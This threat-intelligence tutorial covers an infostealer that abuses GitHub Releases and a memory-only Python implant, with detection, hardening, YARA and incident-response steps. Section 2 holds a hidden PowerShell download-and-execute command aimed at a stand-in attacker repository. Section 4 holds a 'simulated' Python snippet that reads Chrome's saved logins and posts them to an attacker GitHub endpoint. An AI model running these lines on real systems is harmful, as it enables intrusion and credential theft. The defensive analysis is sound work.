
Introduction:
Attackers are increasingly exploiting trusted cloud infrastructure to bypass security controls. A newly uncovered infostealer campaign abuses GitHub Releases—a legitimate feature for distributing software—to hide malicious payloads, while employing a PE-less Python implant that runs entirely in memory without writing traditional executable files to disk. This multi-stage obfuscation enables long-term covert access to targeted Windows systems, primarily focusing on Russian-speaking users through socially engineered phishing lures.
Learning Objectives:
- Understand the complete attack chain from phishing LNK files to PE-less Python execution and data exfiltration via GitHub Releases.
- Learn detection techniques for malicious LNK files, PowerShell abuse, and unauthorized GitHub API calls.
- Implement mitigation strategies including application whitelisting, PowerShell logging, and network traffic analysis to block similar infostealer campaigns.
You Should Know
1. Anatomy of the Phishing LNK+RAR Attack Vector
Attackers begin by distributing a password-protected RAR archive containing a malicious LNK (shortcut) file. The archive is themed as a Russian humanitarian aid request form to build contextual trust. When the victim double-clicks the LNK file, it executes a hidden PowerShell command that downloads and runs the Python implant without ever dropping a traditional .exe.
Step-by-step guide to analyze suspicious LNK files:
On Windows (using built-in tools):
```powershell
# Extract LNK target and command-line arguments
$lnk = (New-Object -ComObject WScript.Shell).CreateShortcut("malicious.lnk")
Write-Host "Target: " $lnk.TargetPath
Write-Host "Arguments: " $lnk.Arguments
Write-Host "Working Directory: " $lnk.WorkingDirectory
```
On Linux (using `lnkinfo` from liblnk-utils):
```bash
# Install tools
sudo apt install liblnk-utils exiftool
# Analyze LNK structure
lnkinfo malicious.lnk
# Extract embedded command strings (LNK string data is UTF-16LE, so use 16-bit little-endian mode)
strings -a -e l malicious.lnk | grep -iE "powershell|cmd|python"
```
What to look for: LNK files with unusually large command-line strings, references to PowerShell with -EncodedCommand, or mshta.exe/regsvr32.exe as targets.
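As an added example (not code from the original post or from the campaign's tooling): a minimal Python parser for the StringData section of the shell-link format that pulls the working directory and command-line arguments out of a .lnk and applies the "what to look for" checks above. The sample shortcut is constructed inside the block by `build_test_lnk`; that helper and the indicator list are assumptions of this example.

```python
import struct

HEADER_SIZE = 0x4C                         # fixed ShellLinkHeader size (MS-SHLLINK)
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits that decide which optional structures follow the header
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"), (HAS_ICON, "icon"))
# Indicators from the section above (assumed list, lower-cased for matching)
INDICATORS = ("-encodedcommand", "-enc ", "downloadstring", "mshta", "regsvr32", "python -c", "-windowstyle hidden")

def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields of a shell link, skipping the ID list and LinkInfo blocks."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE or data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_ID_LIST:                # IDListSize (2 bytes) followed by the item ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:              # LinkInfoSize (4 bytes) counts the size field itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += count * width
    return fields

def triage_lnk(data: bytes, max_args: int = 200) -> list:
    """Findings for the 'what to look for' list: long argument strings and script-host indicators."""
    args = parse_lnk_strings(data).get("arguments", "")
    findings = [f"arguments unusually long ({len(args)} chars)"] if len(args) > max_args else []
    findings += [f"indicator {hit!r}" for hit in INDICATORS if hit in args.lower()]
    return findings

def build_test_lnk(arguments: str, working_dir: str = r"C:\Windows\System32") -> bytes:
    """Constructed minimal Unicode .lnk carrying only WorkingDir and Arguments (test input, not a real sample)."""
    flags = HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sI", HEADER_SIZE, LINK_CLSID, flags).ljust(HEADER_SIZE, b"\x00")
    enc = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + enc(working_dir) + enc(arguments)
```

Real samples usually also carry an ID list and LinkInfo block; the parser skips both by their size fields, so it handles those as well as the minimal constructed one.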
2. PE-less Python Implant Execution & Persistence
The campaign uses a “PE-less” approach: the Python interpreter (already present on many Windows systems) is invoked via PowerShell to execute an in-memory script downloaded from GitHub Releases. No portable executable is written to disk, evading traditional file-based AV scans.
Command used to execute the implant:
```powershell
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$c=(New-Object Net.WebClient).DownloadString('https://github.com/attacker/repo/releases/download/v1/payload.txt'); python -c $c}"
```
Persistence mechanisms (common methods abused):
```powershell
# Check registry run keys for suspicious entries
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# Check scheduled tasks (findstr treats space-separated strings as alternatives)
schtasks /query /fo LIST /v | findstr /i "python powershell"
# Check WMI event subscription (more advanced persistence)
Get-WmiObject -Namespace root\Subscription -Class __EventFilter
```
Detection: Monitor for `python.exe` spawning from non-standard parent processes (e.g., `powershell.exe` spawned by `explorer.exe` via LNK). Use Sysmon Event ID 1 (process creation) with custom rules.
3. Abusing GitHub Releases for Malware Payload Hosting
GitHub Releases provides authenticated, HTTPS-secured downloads with high uptime and reputation. The campaign uploads base64-encoded or encrypted Python payloads as release assets (e.g., v1/payload.txt). These files are downloaded via API or direct URL, blending with legitimate traffic.
How to detect GitHub Releases abuse in network logs:
Windows PowerShell detection:
```powershell
# Sysmon Event ID 22 (DNS query) records only the queried name, so match on the host and the querying image;
# the releases/download URL path is visible in PowerShell Script Block logs (Event ID 4104) or proxy logs, not here.
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=22} |
  Where-Object { $_.Message -match 'QueryName:\s+(.*\.)?github\.com' -and $_.Message -match 'Image:.*\\(powershell|pwsh|python)\.exe' }
```
Linux-based network monitoring with tcpdump:
```bash
# Capture HTTPS traffic to GitHub. The URL path is inside TLS; only the SNI hostname is visible on the wire.
sudo tcpdump -i eth0 -s 0 -A 'tcp port 443 and host github.com' | grep -i "github.com"
# Alternative: use Zeek (formerly Bro) and query its ssl.log for GitHub SNI names
zeek-cut ts id.orig_h server_name < ssl.log | grep -i "github.com"
# Matching User-Agent values (python-requests, powershell) needs a TLS-terminating proxy that produces http.log
```
Mitigation: Organizations can block unauthenticated downloads from GitHub Releases via web filter, but risk breaking legitimate workflows. Instead, implement allowlisting of approved GitHub repositories.
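The Script Block log check mentioned above, as an added example (not from the original post): the implant's launch line typically hides the GitHub Releases URL behind `-EncodedCommand`, so the detector decodes that argument (base64 of UTF-16LE) before extracting release-asset URLs from 4104 script blocks or process command lines. The sample records are constructed inside the block and `example-org/example-repo` is a placeholder, not the campaign's repository.

```python
import base64
import re

RELEASE_URL = re.compile(r"https://github\.com/[\w.-]+/[\w.-]+/releases/download/[^\s'\"]+", re.I)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(text: str) -> str:
    """If text carries a -EncodedCommand argument, return the decoded (base64, UTF-16LE) script; else text unchanged."""
    m = ENCODED_ARG.search(text)
    if not m:
        return text
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return text           # not a valid encoded command; fall back to the raw text

def github_release_urls(records) -> list:
    """records: (source, text) pairs from Script Block logs (4104) or process command lines.
    Returns (source, url) for every GitHub release-asset URL, including ones hidden by -EncodedCommand."""
    hits = []
    for source, text in records:
        for url in RELEASE_URL.findall(decode_encoded_command(text)):
            hits.append((source, url))
    return hits

# Constructed sample records (example-org/example-repo is a placeholder, not the campaign's repository)
PAYLOAD_URL = "https://github.com/example-org/example-repo/releases/download/v1/payload.txt"
SCRIPT = f"& {{$c=(New-Object Net.WebClient).DownloadString('{PAYLOAD_URL}'); python -c $c}}"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
SAMPLE_RECORDS = [
    ("4104", "Get-ChildItem -Path C:\\Users -Recurse"),                                   # benign script block
    ("cmdline", f"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {ENCODED}"),  # launch line
    ("4104", SCRIPT),                                                                    # logged after decoding
]
```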
4. Data Exfiltration & C2 Communication Patterns
After establishing the Python implant, the infostealer collects browser credentials, cryptocurrency wallets, and system information. Data is exfiltrated via the same GitHub Releases channel (using authenticated uploads with stolen tokens) or through alternative C2.
Simulated exfiltration Python snippet (for defensive testing):
```python
import requests, json, os, base64
# Collect browser profiles (example Chrome)
chrome_path = os.environ['USERPROFILE'] + r'\AppData\Local\Google\Chrome\User Data\Default\Login Data'
with open(chrome_path, 'rb') as f:
    data = base64.b64encode(f.read()).decode()
# Exfiltrate via GitHub API (requires token)
url = "https://api.github.com/repos/attacker/repo/releases/123/assets"
headers = {"Authorization": "token ghp_FAKETOKEN", "Content-Type": "application/octet-stream"}
requests.post(url, headers=headers, data=data)
```
Detection of exfiltration:
- Monitor for unexpected outbound base64-encoded POST requests to api.github.com.
- Enable PowerShell Script Block Logging (Event ID 4104) to capture obfuscated commands.
- Use Sysmon Event ID 3 for network connections: filter for `Destination IP: 140.82.112.` (GitHub ranges) with `Image: python.exe`.
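The two Sysmon checks from sections 2 and 4 (python.exe spawned through the explorer.exe -> powershell.exe chain of an LNK double-click, and python.exe connecting into the GitHub address range) correlated on ProcessGuid, as an added example that is not part of the original post. The events are constructed with Sysmon's field names and placeholder GUIDs; the /20 prefix for the 140.82.112. range is GitHub's published allocation.

```python
import ipaddress

GITHUB_NET = ipaddress.ip_network("140.82.112.0/20")   # the 140.82.112. range cited above, as GitHub publishes it
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed Sysmon events using Sysmon's own field names; GUIDs are shortened placeholders, not real telemetry.
PY_USER = r"C:\Users\victim\AppData\Local\Programs\Python\Python312\python.exe"
EVENTS = [
    {"EventID": 1, "ProcessGuid": "{G1}", "ParentProcessGuid": "{G0}", "Image": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessGuid": "{G2}", "ParentProcessGuid": "{G1}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventID": 1, "ProcessGuid": "{G3}", "ParentProcessGuid": "{G2}", "Image": PY_USER},
    {"EventID": 3, "ProcessGuid": "{G3}", "Image": PY_USER, "DestinationIp": "140.82.112.3", "DestinationPort": 443},
    # benign: a developer's IDE launching python, which then talks to an internal host
    {"EventID": 1, "ProcessGuid": "{G4}", "ParentProcessGuid": "{G0}", "Image": r"C:\Program Files\IDE\ide.exe"},
    {"EventID": 1, "ProcessGuid": "{G5}", "ParentProcessGuid": "{G4}", "Image": r"C:\Python312\python.exe"},
    {"EventID": 3, "ProcessGuid": "{G5}", "Image": r"C:\Python312\python.exe", "DestinationIp": "10.0.0.5", "DestinationPort": 8080},
]

def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def lnk_python_chains(events) -> dict:
    """Event ID 1: python.exe started by a script host that explorer.exe started (the LNK double-click pattern).
    Returns {python ProcessGuid: chain description}."""
    procs = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    chains = {}
    for guid, proc in procs.items():
        parent = procs.get(proc["ParentProcessGuid"])
        grand = procs.get(parent["ParentProcessGuid"]) if parent else None
        if (image_name(proc["Image"]) == "python.exe" and parent and image_name(parent["Image"]) in SCRIPT_HOSTS
                and grand and image_name(grand["Image"]) == "explorer.exe"):
            chains[guid] = f"explorer.exe -> {image_name(parent['Image'])} -> python.exe"
    return chains

def python_github_connections(events) -> set:
    """Event ID 3: python.exe connecting into the GitHub address range."""
    return {e["ProcessGuid"] for e in events if e["EventID"] == 3 and image_name(e["Image"]) == "python.exe"
            and ipaddress.ip_address(e["DestinationIp"]) in GITHUB_NET}

def alerts(events) -> list:
    """Correlate both signals on ProcessGuid: a python.exe from an LNK chain that also reaches GitHub."""
    chains = lnk_python_chains(events)
    return sorted((guid, chains[guid]) for guid in python_github_connections(events) if guid in chains)
```

Either signal alone is noisy on developer machines (the benign IDE chain above shows why); the correlated alert is the one worth paging on.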
5. Hardening Windows Against LNK & Script-Based Attacks
Prevent this campaign by configuring Windows security features:
Step 1: Disable LNK file execution from untrusted sources via Group Policy:
```powershell
# Set software restriction policies or an AppLocker rule to block .lnk files in temp and download folders.
# Note: New-AppLockerPolicy builds rules from Get-AppLockerFileInformation output and has no -Path or -Action
# parameters; a Deny path rule is authored in the AppLocker policy XML (Action="Deny") and applied with
# Set-AppLockerPolicy -XmlPolicy. The line below is the intended rule written in shorthand.
New-AppLockerPolicy -RuleType Path -Path "%USERPROFILE%\Downloads\*.lnk" -Action Deny -User Everyone
```
Step 2: Enable PowerShell logging and constrain language mode:
```powershell
# Enable deep script block logging (create the policy key first; Set-ItemProperty fails if it is missing)
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1
# Set PowerShell to ConstrainedLanguage mode for non-admin users.
# This assignment only affects the current session; enforce it machine-wide through a WDAC or AppLocker policy.
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
```
Step 3: Block Python execution from user-writable directories:
```powershell
# Windows Defender ASR rule. The GUID below is "Block all Office applications from creating child processes",
# which cuts off Office-launched script chains; restricting python.exe to approved directories is done with
# an AppLocker/WDAC executable rule, not an ASR rule.
Add-MpPreference -AttackSurfaceReductionRules_Ids "D4F940AB-401B-4EFC-AADC-AD5F3C50688A" -AttackSurfaceReductionRules_Actions Enabled
```
6. Threat Hunting with YARA Rules for PE-less Payload
Security teams can hunt for the Python implant using YARA rules targeting memory artifacts and downloaded script patterns.
Example YARA rule:
```yara
rule GitHub_Infostealer_Python_Implant {
    meta:
        description = "Detects Python infostealer using GitHub Releases"
        author = "Undercode"
        date = "2026-05-10"
    strings:
        $s1 = "github.com" nocase
        $s2 = "releases/download" nocase
        $s3 = "requests.get" nocase
        $s4 = "exec(" nocase
        $s5 = "base64.b64decode" nocase
        $s6 = "chromium" nocase
    condition:
        // the set must be written as $s* to cover $s1..$s6
        3 of ($s*) and filesize < 200KB
}
```
To scan running Python processes on Windows:
```powershell
# Dump Python process memory and scan with YARA (one dump per PID so several interpreters do not overwrite each other)
Get-Process python -ErrorAction SilentlyContinue | ForEach-Object {
    $dump = "$($_.ProcessName)_$($_.Id)"
    .\procdump.exe -accepteula -ma $_.Id $dump
    yara64.exe implant_rule.yara "$dump.dmp"
}
```
7. Incident Response Steps for Compromised Systems
If an infostealer infection is suspected:
1. Isolate the host from the network (disable NIC or unplug cable).
2. Capture memory using `DumpIt` or `FTK Imager`.
3. Collect PowerShell logs:
```powershell
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Export-Csv ps_scripts.csv
```
4. Review GitHub API access in firewall logs and Windows `EventID 3` (Sysmon).
5. Extract and reverse the Python implant from memory strings:
```bash
# On Linux analysis VM (-a scans the whole file, not just loadable sections)
strings -a victim_memory.dmp | grep -A 50 "def main"
```
6. Reset all credentials stored on the machine and revoke any OAuth tokens found in memory.
What Undercode Say:
- Trusted platforms are the new battleground: Attackers abuse GitHub Releases not because of a vulnerability, but because of inherent trust—security teams must monitor outbound traffic to legitimate services with the same scrutiny as unknown domains.
- PE-less malware requires behavioral detection: Traditional file-based AV is blind to Python scripts executed entirely in memory. Organizations must invest in EDR solutions that hook into PowerShell, Python, and WMI to detect malicious parent-child process relationships and anomalous network connections.
This campaign demonstrates a maturing threat actor refining delivery techniques (from RAR+LNK to survey lures) to improve click-through rates. The use of Russian humanitarian themes indicates focused geopolitical targeting. Defenders should prioritize PowerShell Script Block Logging, implement AppLocker to restrict Python execution to authorized directories, and treat all GitHub Releases downloads as potentially suspicious until verified. The shift toward living-off-the-land and cloud‑abuse tactics means visibility into script interpreters and API calls is no longer optional—it’s essential for survival.
Prediction:
As GitHub and similar platforms (GitLab, AWS S3, Azure Blob) continue to be abused, we will see the emergence of “reputation-based detection” models that analyze download frequency, username-behavior anomalies, and file entropy on trusted domains. Within 12 months, threat actors will begin using AI-generated phishing content tailored to specific GitHub repository topics (e.g., fake security updates from popular projects), further lowering victim suspicion. Organizations that fail to implement strict outbound TLS inspection for developer platforms will remain vulnerable to these supply-chain‑adjacent attacks.
Reported By: Cybersecuritynews Gbhackers – Hackers Feeds